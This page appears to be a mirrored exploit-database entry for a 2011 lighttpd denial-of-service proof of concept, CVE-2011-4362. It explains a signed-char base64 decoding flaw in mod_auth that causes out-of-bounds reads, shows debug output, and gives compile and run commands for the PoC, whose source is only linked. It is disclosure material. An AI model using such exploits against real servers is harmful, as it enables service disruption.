Skip to content
cyberexploits
doslinuxtext

lighttpd - Denial of Service (PoC)

lighttpd - Denial of Service (PoC)

Published on 2011-12-31

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/linux/dos/18295.txt7eac4c3a
raw
29 of November 2011 was the date of public disclosure interesting

vulnerability in lighttpd server. Xi Wang discovered that mod_auth

for this server does not propely decode characters from the extended

ASCII table. The vulnerable code is below:





"src/http_auth.c:67"

--- CUT ---

static const short base64_reverse_table[256] = ...;

static unsigned char * base64_decode(buffer *out, const char *in) {

	...

	int ch, ...;

	size_t i;

	...



		ch = in[i];

		...

		ch = base64_reverse_table[ch];

	...

}

--- CUT ---



Because variable 'in' is type 'char', characters above 0x80 lead to

negative indices.

This vulnerability may lead out-of-boud read and theoretically cause

Segmentation Fault (Denial of Service attack).

Unfortunately I couldn't find any binaries where .rodata section before

the base64_reverse_table

table cause this situation.



I have added some extra debug in the lighttpd source code to see if this

vulnerability is

executed correctly. Here is output for one of the example:



--- CUT ---

ptr[0x9a92c48] size[0xc0] used[0x0]

127(. | 0 | 0)

-128(t | 1 | 0)

-127(e | 2 | 1)

-126(' | 3 | 2)

-125(e | 4 | 3)

-124(u | 5 | 3)

-123(r | 6 | 4)

-122(' | 7 | 5)

-121(s | 8 | 6)

-120(c | 9 | 6)

-119(i | 10 | 7)

-118(n | 11 | 8)

-117(i | 12 | 9)

-116(  | 13 | 9)

-115(a | 14 | 10)

-114(t | 15 | 11)

-113(. | 16 | 12)

-112(e | 17 | 12)

-111(u | 18 | 13)

-110(r | 19 | 14)

-109(' | 20 | 15)

-108(f | 21 | 15)

-107(i | 22 | 16)

-106(e | 23 | 17)

-105(: | 24 | 18)

-104(= | 25 | 18)

-103(o | 26 | 19)

-102(t | 27 | 20)

-101(o | 28 | 21)

-100(  | 29 | 21)

-99(a | 30 | 22)

-98(g | 31 | 23)

-97(. | 32 | 24)

-96(d | 33 | 24)

-95(g | 34 | 25)

-94(s | 35 | 26)

-93(: | 36 | 27)

-92(u | 37 | 27)

-91(s | 38 | 28)

-90(p | 39 | 29)

-89(o | 40 | 30)

-88(t | 41 | 30)

-87(d | 42 | 31)

-86(b | 43 | 32)

-85(c | 44 | 33)

-84(e | 45 | 33)

-83(d | 46 | 34)

-82(( | 47 | 35)

-81(n | 48 | 36)

-80(y | 49 | 36)

-79(h | 50 | 37)

-78(d | 51 | 38)

-77(g | 52 | 39)

-76(s | 53 | 39)

-75(  | 54 | 40)

-74(r | 55 | 41)

-73(p | 56 | 42)

-72(a | 57 | 42)

-71(n | 58 | 43)

-70(. | 59 | 44)

-69(. | 60 | 45)

-68(d | 61 | 45)

-67(g | 62 | 46)

-66(s | 63 | 47)

-65(: | 64 | 48)

-64(( | 65 | 48)

-63(d | 66 | 49)

-62(- | 67 | 50)

-61(e | 68 | 51)

-60(s | 69 | 51)

-59(  | 70 | 52)

-58(i | 71 | 53)

-57(s | 72 | 54)

-56(n | 73 | 54)

-55(  | 74 | 55)

-54(i | 75 | 56)

-53(l | 76 | 57)

-52(. | 77 | 57)

-51(. | 78 | 58)

-50(k | 79 | 59)

-49(0 | 80 | 60)

-48(% | 81 | 60)

-47(] | 82 | 61)

-46(p | 83 | 62)

-45(r | 84 | 63)

-44(0 | 85 | 63)

-43(% | 86 | 64)

-42(] | 87 | 65)

-41(s | 88 | 66)

-40(z | 89 | 66)

-39([ | 90 | 67)

-38(x | 91 | 68)

-37(x | 92 | 69)

-36(  | 93 | 69)

-35(s | 94 | 70)

-34(d | 95 | 71)

-33(0 | 96 | 72)

-32(% | 97 | 72)

-31(] | 98 | 73)

-30(. | 99 | 74)

-29(. | 100 | 75)

-28(d | 101 | 75)

-27(c | 102 | 76)

-26(d | 103 | 77)

-25(i | 104 | 78)

-24(g | 105 | 78)

-23(b | 106 | 79)

-22(s | 107 | 80)

-21(6 | 108 | 81)

-20(- | 109 | 81)

-19(t | 110 | 82)

-18(i | 111 | 83)

-17(g | 112 | 84)

-16(f | 113 | 84)

-15(i | 114 | 85)

-14(e | 115 | 86)

-13(. | 116 | 87)

-12(. | 117 | 87)

-11(. | 118 | 88)

-10(. | 119 | 89)

-9(. | 120 | 90)

-8(. | 121 | 90)

-7(. | 122 | 91)

-6(. | 123 | 92)

-5(. | 124 | 93)

-4(. | 125 | 93)

-3(. | 126 | 94)

-2(. | 127 | 95)

-1(. | 128 | 96)

k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]

ptr[0x9a92c48] size[0xc0] used[0x60]

string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.]

--- CUT ---



First column is the offset so vulnerability is executed like it should be

(negative offsets). Second column is byte which is read out-of-bound.



How to run this very primitive Proof of Concept?



$ gcc p_cve-2011-4362.c -o p_cve-2011-4362

$ ./p_cve-2011-4362 



	...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)

]=- :::...



	Usage: ./p_cve-2011-4362 <options>



		Options:

			 -v <victim>

			 -p <port>

			 -d <remote_dir_for_auth>



$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa



	...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)

]=- :::...



		[+] Preparing arguments... OK

		[+] Creating socket... OK

		[+] Connecting to [127.0.0.1]... OK

		[+] Sending dirty packet... OK



		[+] Check the website!



$ 



Lighttpd will log this situation probably in error-log file like this:



--- CUT ---

..

..

2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in

�Yg\���n�Xt�]rze���gY��\��Yb�Y(�d��r�[Y���-�xi��i�k�Wp�	]߶��\���@V��x���ize



--- CUT ---



Maybe you can find vulnerable binary?



Best regards,

Adam 'pi3' Zabrocki





--

http://pi3.com.pl

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18295.c (p_cve-2011-4362.c)

http://blog.pi3.com.pl/?p=277

View on GitHub